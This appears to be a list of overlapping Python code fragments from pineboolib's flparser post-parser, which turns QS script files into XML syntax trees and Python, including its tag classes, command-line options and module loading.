"to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read()"
] |
[
"adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if",
"options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" % (bname,",
"ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) ==",
"class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True",
"source.xml class Module(object): def __init__(self, name, path): self.name = name self.path = path",
"qsatype for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if",
"def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class",
"lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\",",
"options.topython: from .pytnyzer import pythonize import io if options.cache: args = [x for",
"classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break",
"= [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags",
"pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {}",
"self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return",
"self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn:",
"is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem",
"os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod =",
"\".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" %",
"= ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject):",
"encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir",
"fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in",
"return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem)",
"if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" %",
"class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags",
"sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname,",
"1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout",
"or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return",
"text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s:",
"io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error",
"len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else:",
"return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if",
"except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose:",
"listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self,",
"= ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: #",
"flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\" %",
"@classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True #",
"class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags",
"abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if",
"1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"]",
"polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0]",
"['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if",
"nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent)",
". .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for",
"treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn",
"class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags =",
"% (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname",
"set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags",
"stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" %",
"= \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags =",
"from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\")",
"callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags =",
"self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn,",
"len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname =",
"description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name",
"['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags =",
"parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write",
"if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype =",
"Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath",
"len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing",
"= False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False",
"XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s",
"% bname).join(text.splitlines())) else: if options.cache: args = [x for x in args if",
"debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject):",
"parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no",
"self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\":",
"else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename):",
"xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None",
"self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if",
"self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags",
"imp import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except",
"sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as",
"# description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname)",
"\".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose:",
"not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import",
"= [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags =",
"import object from optparse import OptionParser import os import os.path import sys import",
"No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0:",
"NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags",
"'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self,",
"= False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return",
"except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except Exception",
"resultado, no hace falta calcular mas continue tree_data = None try: tree_data =",
"= parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True",
"if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if",
"False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\",",
"if options.cache: args = [x for x in args if not os.path.exists((x +",
"metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other = True",
"no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . .",
"argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags",
"import OptionParser import os import os.path import sys import imp import traceback from",
"[\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject):",
"al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in",
"tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags",
"self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None",
"\" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args =",
"class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases,",
"# ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True",
"argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\",",
"class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags",
"classobj = cls break if classobj is None: return None return classobj(tagname) def",
"== 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self",
"argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and",
"default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file",
"set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self,",
"filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero",
"type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS:",
"filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ ==",
"print(\"Fichero %r no encontrado\" % self.name) result = False except Exception as e:",
"+ \".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast,",
"fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname ==",
"\"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject):",
"DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags =",
"[arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if",
"self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default",
"fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result =",
"break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem",
"= [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags",
"KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if",
"= [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at",
"treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name",
"= ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name =",
"= len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname",
"= False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject):",
"== 0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"]",
"CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype,",
"def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\")",
"= Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif",
"super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False",
"destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc())",
"value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1]",
"options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and",
"mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize",
"'\"') if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\")",
"False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {}",
"0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not",
"not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing",
"return source.xml class Module(object): def __init__(self, name, path): self.name = name self.path =",
"self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags =",
"add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list']",
"file load . . .\") options.topython = False try: execute( options, [(arg +",
"destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename)",
"if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file",
"UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else:",
"enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else:",
"filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s .",
"str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype ==",
"action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args) =",
". . . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) /",
"file . . .\") try: execute(options, [arg + \".xml\" for arg in args])",
"VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\",",
"debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other =",
"tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class",
"len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\",",
"def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id",
"[\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject):",
"With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags =",
"+ repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype)",
"\".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc())",
"pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text)",
"if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except",
"(repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" %",
"= [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value",
"continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"],",
"= [] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags =",
"= [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if",
"= {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def",
"global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn =",
"al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if",
"= [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\",",
"options.full: execpython = options.exec_python options.exec_python = False options.full = False options.toxml = True",
"dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml",
"value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def",
"= OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\")",
"load . . .\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\",",
"tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"]",
"dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest",
"cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None:",
"type_arg = 0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\",",
"= [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags",
"dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags",
"print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s",
"self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id =",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject):",
"def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # -----------------",
"{} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in",
"Pythonize and write PY file . . .\") try: execute(options, [arg + \".xml\"",
"== 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags =",
"global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn",
"import os import os.path import sys import imp import traceback from lxml import",
"import sys import imp import traceback from lxml import etree try: from pineboolib.flparser",
"[\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname",
"return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\"",
"name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\"",
"if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\",",
"promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other =",
"flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global",
"Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag =",
"options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname,",
"continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" %",
"[\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def",
"return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback:",
"class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value):",
"destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if",
"debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"]",
"is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath:",
"add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and",
"None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags =",
"tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"]",
"= \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type",
"[\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags =",
"return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname",
"self.name) result = False except Exception as e: print(traceback.format_exc()) result = False if",
"sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename)))",
"% name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo",
"parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname ==",
"% (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo",
"is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype +",
"tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir",
"return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class",
"abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores",
"argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags =",
"dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python",
"self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags",
"path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name)",
"add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\":",
"[\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject):",
"class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True",
"Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for",
"\"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname",
"False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject):",
"debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall',",
"% (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No",
"= ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject):",
"If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags =",
"True if options.verbose: print(\"Pass 2 - Pythonize and write PY file . .",
"xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn =",
"result = False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser()",
"[\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"os.path import sys import imp import traceback from lxml import etree try: from",
"\"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\"",
"ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1',",
"filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython =",
"\"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\":",
"= True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone =",
"self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem =",
"for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath,",
"= [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class",
"child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn,",
"pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True",
"dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k,",
"not options.toxml: # Si no se quiere guardar resultado, no hace falta calcular",
"options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def",
"DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags =",
"name self.path = path def loadModule(self): fp = None try: description = ('.py',",
"def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args =",
"PY file . . .\") try: execute(options, [arg + \".xml\" for arg in",
"v in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction)",
"= False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id",
"(repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar",
"\"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags",
"2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache:",
"= [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\"",
"[\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem =",
